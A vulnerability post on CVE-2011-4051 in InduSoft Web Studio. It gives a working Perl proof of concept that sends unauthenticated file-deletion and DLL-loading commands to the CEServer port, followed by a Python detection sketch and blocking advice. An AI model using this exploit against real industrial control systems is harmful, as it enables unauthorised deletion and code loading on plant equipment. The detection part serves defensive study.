
CVE-2011-4051 : Proof of Concept Code

InduSoft Web Studio 6.1 and 7.0 allow unauthenticated users to run commands such as deleting or creating files and folders and loading a DLL.

The vulnerability was discovered by Luigi Auriemma.

Here is a simple PoC for this vulnerability:


#PoC for CVE-2011-4051
#The CEServer module in InduSoft Web Studio 6.1 and 7.0 allows an unauthenticated user to run commands.
#These are: remove file/directory, send/update file, start/stop runtime project,
#and load a DLL into the WebStudio process.
#Modify the script to suit your needs.
#Vulnerability discovered by Luigi Auriemma
#http://zerodayinitiative.com/advisories/ZDI-11-330/
#Celil Ünüver
#www.signalsec.com


use IO::Socket;
$host = "192.168.138.128";
$port = 4322;
$sock = IO::Socket::INET->new( PeerAddr => $host,
                               PeerPort => $port,
                               Proto    => 'tcp') or die "Unable to create socket: $!";

$start = "\x07";
$rmvfile = "\x15";
$rmvdir = "\x10";
$dlltag = "\x31";
$sendfile ="\x04";
#0x10 remove directory
#0x15 remove file
#0x01 update a file
#0x08 stop softplc runtime project
#0x07 start softplc runtime project
#0x31 run/load DLL
$data = "C:\\Python24";
$removedir = $rmvdir.$data;
print $sock $removedir;
print "\nOverflow request sent....";
close($sock);
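
Because the service accepts these commands without authentication, monitoring has to key on who is talking to port 4322 and which command byte they send. The following detection sketch is an added example, not part of the original post or of InduSoft's software; it assumes the layout the PoC uses (one command byte followed by the argument), takes the opcode meanings from the PoC's comments, and runs over constructed flow records with a hypothetical allowlist of engineering workstations.

```python
import ipaddress

CESERVER_PORT = 4322  # port used by the PoC above

# Opcode meanings as listed in the PoC's comments (0x04 from its $sendfile variable).
OPCODES = {
    0x01: "update file",
    0x04: "send file",
    0x07: "start runtime project",
    0x08: "stop runtime project",
    0x10: "remove directory",
    0x15: "remove file",
    0x31: "load DLL",
}

def classify(payload: bytes):
    """Return (command, argument) for a first client payload, or None if unrecognised."""
    if not payload or payload[0] not in OPCODES:
        return None
    # Assumption: everything after the command byte is the argument string.
    arg = payload[1:].decode("latin-1").rstrip("\x00")
    return OPCODES[payload[0]], arg

def find_alerts(flows, allowed_sources):
    """Flag CEServer commands arriving from hosts outside the allowlist."""
    nets = [ipaddress.ip_network(n) for n in allowed_sources]
    alerts = []
    for src, dport, payload in flows:
        if dport != CESERVER_PORT:
            continue
        hit = classify(payload)
        if hit is None:
            continue
        if any(ipaddress.ip_address(src) in n for n in nets):
            continue  # expected engineering workstation
        alerts.append({"src": src, "command": hit[0], "argument": hit[1]})
    return alerts

# Constructed sample flows: (source IP, destination port, first client payload).
SAMPLE_FLOWS = [
    ("10.0.5.20", 4322, b"\x10C:\\Python24"),
    ("10.0.1.10", 4322, b"\x07"),
    ("10.0.5.20", 80, b"\x15not-ceserver"),
    ("10.0.7.9", 4322, b"\x31C:\\temp\\x.dll"),
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_FLOWS, ["10.0.1.0/24"]):
        print(alert)
```

The same opcode table can back a network IDS rule; the more durable mitigation is to block port 4322 from everything except the hosts that legitimately deploy projects.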

 